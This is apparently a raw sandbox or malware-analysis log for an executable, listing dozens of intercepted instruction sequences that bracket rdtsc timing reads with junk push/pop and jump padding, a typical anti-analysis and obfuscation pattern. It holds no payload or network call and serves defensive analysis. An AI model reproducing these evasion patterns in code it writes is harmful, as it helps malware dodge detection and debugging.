Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94FC00 second address: 94FC17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9834D7504Ch 0x0000000b popad 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94FD52 second address: 94FD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95005D second address: 950065 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 950065 second address: 950075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F98351AAB16h 0x0000000a jc 00007F98351AAB16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9501F1 second address: 9501F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9501F7 second address: 950202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F98351AAB16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 950202 second address: 950208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 950208 second address: 95020C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 956CD4 second address: 956D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9834D7504Ah 0x0000000b jmp 00007F9834D75055h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 956D00 second address: 956D31 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98351AAB16h 0x00000008 jmp 00007F98351AAB28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 956D31 second address: 956D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955697 second address: 9556A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9556A1 second address: 9556A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955C39 second address: 955C45 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F98351AAB16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955C45 second address: 955C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9834D75046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90206A second address: 90206F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90206F second address: 9020BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007F9834D7504Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 jmp 00007F9834D7504Fh 0x0000001a mov ebx, dword ptr [ebp+124870D4h] 0x00000020 call 00007F9834D7504Bh 0x00000025 mov dword ptr [ebp+1245355Ah], eax 0x0000002b pop edx 0x0000002c add eax, ebx 0x0000002e xor dword ptr [ebp+122D2C00h], ecx 0x00000034 push eax 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007F9834D75046h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9020BD second address: 902115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a jnl 00007F98351AAB1Ah 0x00000010 push 00000004h 0x00000012 jmp 00007F98351AAB25h 0x00000017 nop 0x00000018 push ecx 0x00000019 jmp 00007F98351AAB25h 0x0000001e pop ecx 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007F98351AAB20h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955E04 second address: 955E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F9834D7504Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955F50 second address: 955F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F98351AAB29h 0x0000000b jmp 00007F98351AAB23h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955F88 second address: 955F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9834D7504Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955F96 second address: 955F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955F9A second address: 955FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9834D75046h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955FA6 second address: 955FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955FAC second address: 955FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955FB0 second address: 955FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955FB6 second address: 955FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955FC0 second address: 955FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 955FC6 second address: 955FD0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9834D75046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95C44D second address: 95C47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F98351AAB23h 0x0000000b jmp 00007F98351AAB22h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95C76F second address: 95C773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95C773 second address: 95C777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95C9FD second address: 95CA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95CA05 second address: 95CA12 instructions: 0x00000000 rdtsc 0x00000002 je 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95D550 second address: 95D557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95D557 second address: 95D589 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F98351AAB1Ch 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 pop eax 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95D589 second address: 95D58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95D58E second address: 95D598 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F98351AAB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95D598 second address: 95D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95DB67 second address: 95DB6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95DB6E second address: 95DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jl 00007F9834D7504Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 95DB7E second address: 95DB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F98351AAB1Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9629C8 second address: 9629CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9629CC second address: 9629D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 961E41 second address: 961E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9834D75054h 0x00000009 pop edi 0x0000000a jnp 00007F9834D75048h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 962000 second address: 962017 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98351AAB1Ch 0x00000008 push ecx 0x00000009 jno 00007F98351AAB16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 962176 second address: 96217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96241C second address: 962465 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F98351AAB28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F98351AAB2Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F98351AAB22h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007F98351AAB1Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9625B8 second address: 9625F8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F9834D75058h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F9834D75058h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9625F8 second address: 9625FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC4E second address: 96EC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC52 second address: 96EC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F98351AAB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC5E second address: 96EC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC64 second address: 96EC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC68 second address: 96EC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC6C second address: 96EC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EC7B second address: 96EC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9834D75046h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d jnc 00007F9834D75053h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96DB68 second address: 96DB72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96DB72 second address: 96DB97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F9834D75052h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96DB97 second address: 96DB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96DCF1 second address: 96DCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96DCF7 second address: 96DD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F98351AAB25h 0x0000000b popad 0x0000000c jns 00007F98351AAB18h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EB0B second address: 96EB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96EB0F second address: 96EB15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96CADC second address: 96CAE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96CAE2 second address: 96CAE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96CAE7 second address: 96CAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 96CAED second address: 96CAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 97127D second address: 97128D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9834D7504Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 97128D second address: 97129B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 97129B second address: 9712B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9834D75057h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 978ECD second address: 978EF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F98351AAB16h 0x00000008 jmp 00007F98351AAB27h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 978EF2 second address: 978EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 978EF8 second address: 978EFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 978EFE second address: 978F03 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 97895B second address: 9789B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F98351AAB22h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F98351AAB27h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ecx 0x00000018 jmp 00007F98351AAB20h 0x0000001d pop ecx 0x0000001e pushad 0x0000001f jmp 00007F98351AAB1Fh 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98601E second address: 986024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 986024 second address: 986039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F98351AAB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 986039 second address: 98603D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98603D second address: 986043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 986043 second address: 986064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9834D75053h 0x0000000d jns 00007F9834D75046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 985A9F second address: 985AC4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98351AAB29h 0x00000008 jnp 00007F98351AAB1Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8BCC2C second address: 8BCC32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8BCC32 second address: 8BCC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F98351AAB16h 0x0000000d jmp 00007F98351AAB22h 0x00000012 jbe 00007F98351AAB16h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F98351AAB16h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E4F3 second address: 98E4F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E4F8 second address: 98E51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F98351AAB16h 0x0000000a jmp 00007F98351AAB23h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E51A second address: 98E520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E520 second address: 98E524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 992FE0 second address: 992FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 992FE6 second address: 992FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 992FEB second address: 993000 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9834D75050h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 997853 second address: 997857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 997857 second address: 997872 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9834D7504Ch 0x0000000c jbe 00007F9834D75046h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
